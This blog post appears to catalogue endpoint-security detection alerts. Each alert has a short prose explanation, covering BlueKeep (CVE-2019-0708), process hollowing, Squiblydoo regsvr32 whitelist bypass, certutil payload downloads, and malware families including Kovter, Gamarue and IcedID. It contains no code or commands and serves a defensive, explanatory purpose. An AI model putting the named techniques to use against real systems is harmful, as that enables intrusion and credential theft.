An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (2018)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Squiblydoo application whitelist bypass attempt detected. - (982)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Installcore adware detected - (360)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (190)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (173)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Certutil.exe is downloading a file - (123)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
IcedID malware detected - (76)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.